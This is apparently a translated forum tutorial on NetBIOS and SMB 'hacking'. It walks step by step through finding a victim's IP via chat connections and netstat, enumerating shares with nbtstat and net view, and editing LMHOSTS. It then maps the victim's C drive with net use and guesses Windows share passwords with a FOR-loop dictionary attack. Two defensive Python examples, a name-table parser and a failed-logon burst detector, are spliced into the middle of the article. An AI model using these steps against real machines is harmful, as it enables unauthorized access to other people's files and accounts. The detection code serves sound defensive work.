NetBIOS Hacking and Prevention

Windows listens on the following ports for RPC and NetBIOS/SMB:

    TCP 135       RPC / DCE Endpoint Mapper
    UDP 137       NetBIOS Name Service
    UDP 138       NetBIOS Datagram Service
    TCP 139       NetBIOS Session Service (SMB / CIFS over NetBIOS)
    TCP/UDP 445   Direct Host (SMB - Server Message Block; CIFS - Common Internet File System)

By default Windows 9.x (95, 98, 98SE), NT4 and Windows 2000 listen on port 139, but Windows 9.x does not listen on TCP/UDP 135 (because of this, when the last RPC bug was found, the Blaster virus did not affect computers running Windows 9.x). Windows 2000 and XP also listen on TCP/UDP 445.

Based on this knowledge and the built-in Windows commands (usually found in C:\Windows\System32 or C:\WinNT\System32), people can access other computers on the network.

Finding the victim's IP

An IP address is a number that identifies each computer on a given network. It is a 32-bit number, divided into four 8-bit bytes. There are three ways to write an IP address:

    Decimal (most commonly used):  130.57.30.56
    Binary:                        10000010.00111001.00011110.00111000
    Hexadecimal:                   82 39 1E 38

Each IP address has two parts, the network address and the node address. Computers on the same network always share the same network address (more details on IP addresses are on the HVA portal).

To find your own IP address, use the Windows commands:

1- On Windows 9.x: click Start, Run, type command and press OK (this opens the DOS shell). At the DOS prompt type IPCONFIG (or IPCONFIG /ALL). On Win98 you can also click Start, Run and type WINIPCFG, which gives the same result.

2- On Windows 2000, XP: click Start, Run, type cmd and press OK (this opens the DOS shell). At the prompt type IPCONFIG (or IPCONFIG /ALL). Look at the IP Address line; to the right is a number of the form xxx.xxx.xxx.xxx, which is your IP address while you are online.

Finding the victim's IP and checking whether it has open ports usually takes a lot of time; people use tools such as NetScanPro2000, Essential NetTools (ET3) or IP Tool to make the search faster (and cheaper on the internet bill). Guides on using them and where to download them are also on the forum, in the Tools (Đồ nghề) section.

If you are chatting with the victim over ICQ you can use the netstat -n command (it lists the connections established between your machine and the outside, and the ports they use) to learn the victim's IP. For example, after running netstat -n you get a table like this:

    Active Connections

      Proto  Local Address          Foreign Address        State
      TCP    192.168.0.1:3537       203.195.136.156:2869   ESTABLISHED
      ...

Look under Foreign Address: 203.195.136.156 is the victim's IP address, 2869 is the connection port, and ESTABLISHED tells you that a connection has been established between your computer and the victim.

If you use MSN or Yahoo (YH), netstat -n may not show the victim's IP address but the address of the MSN or YH server instead. To determine it exactly, use YH's Send File to send a file to the victim: before sending, run netstat -n to note the existing connections; while the file is being sent, run netstat -n again and look for the IP address that was newly established. That is exactly the victim's IP address (Send File sets up a direct connection between your machine and the victim's).

Once you have the victim's IP address, use the command nbtstat -a ipAddress (it identifies some information about the victim machine). For example:

    C:\> nbtstat -a 203.210.136.23

(this is only a made-up address, don't try it). You may get lines like these:

           NetBIOS Remote Machine Name Table

       Name               Type         Status
       MAY1           <00>  UNIQUE      Registered
       NETDE          <00>  GROUP       Registered
       MAY1           <03>  UNIQUE      Registered
       MAY1           <20>  UNIQUE      Registered
       ...

       MAC Address = 00-32-04-14-23-E6

Pay attention to the number <20>: if you see it, the victim has enabled File and Printer Sharing. Next, use the command net view ipAddress (it shows what the host is sharing). For example:

    C:\> net view 203.210.136.23

You can see lines similar to these:

    Shared resources at 203.210.136.23

    Share name   Type   Used as   Comment
    C            Disk
    D            Disk
    IPC$         Disk
    ...
    The command completed successfully.
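The name table above is the only place on this page where the <20> record is explained, so here is an added audit example (not code from the original article): a Python script that parses nbtstat -a output, labels each name-suffix record with its standard meaning and reports whether the host is advertising the File Server service, which is what an administrator checking their own machines wants to know. The sample output is constructed to match the article's listing, not real captured data.

```python
import re

# Constructed sample of "nbtstat -a <host>" output, modelled on the name table
# shown in the article above (not real captured data).
SAMPLE_NBTSTAT = """
       NetBIOS Remote Machine Name Table

   Name               Type         Status
   MAY1           <00>  UNIQUE      Registered
   NETDE          <00>  GROUP       Registered
   MAY1           <03>  UNIQUE      Registered
   MAY1           <20>  UNIQUE      Registered

   MAC Address = 00-32-04-14-23-E6
"""

# Standard meaning of the common NetBIOS name suffixes, keyed by (suffix, type).
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation service (host name)",
    ("00", "GROUP"): "Domain or workgroup name",
    ("03", "UNIQUE"): "Messenger service",
    ("20", "UNIQUE"): "File Server service (File and Printer Sharing enabled)",
}
ROW_RE = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")

def parse_name_table(text):
    """Parse nbtstat -a output into (records, mac); header, blank and MAC lines
    are skipped, suffixes missing from SUFFIX_MEANING are labelled 'unknown'."""
    records = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        name, suffix, ntype, status = m.groups()
        suffix = suffix.upper()
        records.append({"name": name, "suffix": suffix, "type": ntype, "status": status,
                        "service": SUFFIX_MEANING.get((suffix, ntype), "unknown")})
    mac = MAC_RE.search(text)
    return records, (mac.group(1) if mac else None)

def file_sharing_exposed(records):
    """True when a registered <20> UNIQUE record exists: the host advertises the
    File Server service and will answer SMB share requests."""
    return any(r["suffix"] == "20" and r["type"] == "UNIQUE"
               and r["status"].lower() == "registered" for r in records)
```

Calling parse_name_table(SAMPLE_NBTSTAT) returns the four records and the MAC address, and file_sharing_exposed on them is True because of the MAY1 <20> row.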
Now find the file LMHOSTS; if it does not exist, create it (on Windows 98 it is in the Windows folder, on XP in \Windows\System32\Drivers\etc, on Win2000 in \WinNT\System32\Drivers\etc). About LMHOSTS: in the past, host names and IP addresses were stored in it, and it was used to resolve a host name to an IP address (name-to-address). The file was updated and managed by SRI-NIC (Stanford Research Institute Network Information Center), which refreshed its contents every few weeks, and network admins downloaded it to their own servers. As the number of web sites on the net grew, this approach became inefficient and time-consuming, and so DNS was born (there is also a detailed article on DNS on the HVA portal).

Add a line to this file with the following syntax:

    ipAddressVictim  nameOfMachine  #PRE

For example, I added the line

    203.210.136.23  MAY1  #PRE

to the LMHOSTS file. Then run nbtstat -R to reload the name cache. Now you can map a new drive on your computer to a shared drive or folder on the victim's computer with the net use command:

    net use DriveLetter: \\ipAddressVictim\shareName

For example:

    net use X: \\203.210.136.23\C

If you see the line "The command completed successfully", you are done: double-click My Computer and see what is new on your computer. To avoid confusion when choosing the drive letter, you can use * instead of a letter and let Windows pick the next free one:

    net use * \\203.210.136.23\C

But sometimes life is not so beautiful: your line is slow, or the victim machine has an access password... If the victim machine runs Windows 95, 98, 98SE or Me you can temporarily use the tool PQWAK (the same as the one on the old Main). What about computers running 2000 or XP that have a user name and password set? You can build a dictionary and use a DOS command to run through it. For example, I would create a file called DoPass.txt with the following format:

    username       password
    Administrator  ""
    Administrator  admin
    Administrator  ...

and then use the FOR command:

    C:\> FOR /F "tokens=1,2*" %i in (DoPass.txt) DO net use \\IpAddressVictim\ShareName

(see the Windows help for the FOR command syntax).

Phuong1234dong
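The dictionary loop above leaves a very recognisable trace on the target, and this added detection example (not part of the original article) shows what to look for in the Windows Security log: a burst of failed logons (event 4625) for one account from one source IP, possibly followed by a success (4624) when the dictionary contained the password. The log lines are constructed for the example in a simplified space-separated format, not a real export, and the threshold and window are assumptions to tune for your environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security log entries, one per line:
# timestamp, event id (4625 = failed logon, 4624 = successful logon),
# target account, source workstation, source IP. Illustrative values only.
SAMPLE_EVENTS = """\
2003-05-12T21:14:01 4625 Administrator ATTACKER01 192.168.0.1
2003-05-12T21:14:02 4625 Administrator ATTACKER01 192.168.0.1
2003-05-12T21:14:02 4625 Administrator ATTACKER01 192.168.0.1
2003-05-12T21:14:03 4625 Administrator ATTACKER01 192.168.0.1
2003-05-12T21:14:04 4625 Administrator ATTACKER01 192.168.0.1
2003-05-12T21:14:05 4624 Administrator ATTACKER01 192.168.0.1
2003-05-12T21:30:10 4625 phuong WKS07 192.168.0.7
2003-05-12T21:45:00 4625 phuong WKS07 192.168.0.7
"""

def parse_events(text):
    """Turn the sample lines into dicts with a datetime and an int event id."""
    events = []
    for line in text.splitlines():
        ts, event_id, user, host, ip = line.split()
        events.append({"time": datetime.fromisoformat(ts), "id": int(event_id),
                       "user": user, "host": host, "ip": ip})
    return events

def find_password_guessing(events, threshold=5, window=timedelta(minutes=1)):
    """Alert on (source ip, account) pairs with >= threshold failed logons inside
    `window`, and record whether a success followed the burst (the sign that the
    dictionary contained the password)."""
    by_source = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_source[(e["ip"], e["user"])].append(e)
    alerts = []
    for (ip, user), evs in by_source.items():
        failures = [e for e in evs if e["id"] == 4625]
        for start in failures:
            burst = [f for f in failures if start["time"] <= f["time"] <= start["time"] + window]
            if len(burst) >= threshold:
                last_fail = burst[-1]["time"]
                success = any(e["id"] == 4624 and e["time"] >= last_fail for e in evs)
                alerts.append({"ip": ip, "user": user, "host": evs[0]["host"],
                               "failures": len(burst), "followed_by_success": success})
                break  # one alert per source/account pair is enough
    return alerts
```

On the sample, only the Administrator attempts from 192.168.0.1 are flagged (five failures in four seconds, then a success); the two failures for phuong are fifteen minutes apart and stay below the threshold.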